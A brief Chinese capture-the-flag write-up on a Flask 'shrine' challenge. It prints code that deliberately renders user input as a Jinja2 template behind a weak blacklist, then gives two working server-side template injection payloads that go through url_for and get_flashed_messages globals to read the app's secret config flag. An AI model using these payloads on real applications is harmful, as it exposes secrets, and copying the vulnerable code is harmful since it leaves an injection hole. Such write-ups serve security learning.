打开页面后,是一段代码:
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
审计代码后,@app.route('/shrine/
猜测是否有模板注入,的确存在,那就很好办了:
但这道题设置了黑名单的:blacklist = ['config', 'self'],config和self以及()都被过滤了,那么{{[].__class__.__base__.__subclasses__()}}就没用了,看了其他师傅的WP,知道python还有一些内置函数,这道题就可以用url_for和get_flashed_messages,config又在current_app中,构造payload:
-
url_for:{{url_for.__globals__['current_app'].config['FLAG']}}
-
get_flashed_messages:{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
总结:
模板注入



